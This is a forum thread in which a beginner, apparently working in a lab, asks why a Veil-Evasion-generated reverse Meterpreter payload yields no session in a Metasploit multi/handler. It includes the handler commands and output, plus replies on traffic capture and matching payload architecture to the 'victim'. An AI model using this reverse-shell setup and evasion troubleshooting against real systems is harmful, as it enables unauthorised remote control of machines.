Jump to content

Kali Linux Metasploit Issue


becckman

Recommended Posts

I am very new to kali linux and this stuff, I'm watching a tutorial and mine did not really work out as the tutorial showed. So I generated a reverse meterpreter with veil evasion which i have downloaded on another machine. My msf exploit does not fucntion properly though, i don't get any sessions etc.

Expected behavior

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf exploit(multi/handler) > exploit

[] Started HTTPS reverse handler on https://10.0.2.15:8080
[
] Starting the payload handler...

Current behavior

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.0.2.15:8080

Machine System

Kali Linux 2017

Metasploit version

metasploit v4.16.31-dev

 

When watching the CPU on target machine's task manager i can see that the program works, but still I get no sessions. Thanks in advance for all help.

Link to comment
Share on other sites

Generate your exe on the command line and make sure you pass the right parameters.

https://www.veil-framework.com/veil-command-line-usage/

Also make sure your listener is using the correct handler.

As an extra check, fire up Wireshark on both machines to watch for network traffic.

Link to comment
Share on other sites

Not sure if it's a bug or me doing wrong as I get no errors or anything, it's just blank after "Started HTTPS reverse handler on https://10.0.2.15:8080". I might be wrong, ( I don't know much about this ) but im pretty certain the problem lays in metasploit and not in Veil ( even if I coded wrong in Veil ) as the program works, but the issue comes up in metasploit which is not really related to the veil program at first is it? 

Link to comment
Share on other sites

Drop wireshark or tcpdump on both machines and watch for traffic. If you see it going out then the victim is calling home but being ignored or not being seen, if you don't see the call out, the victim is broken, if you don't see the receipt on the attacker machine, the routing is broken, if you see traffic on the attacker then the listener is broken.
 
Link to comment
Share on other sites

The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system.

Link to comment
Share on other sites

6 minutes ago, digip said:

The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system.

How can I see or change the bit rate when creating the exe? I know the Kali Linux machine is in 64 bit.

Edited by becckman
Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...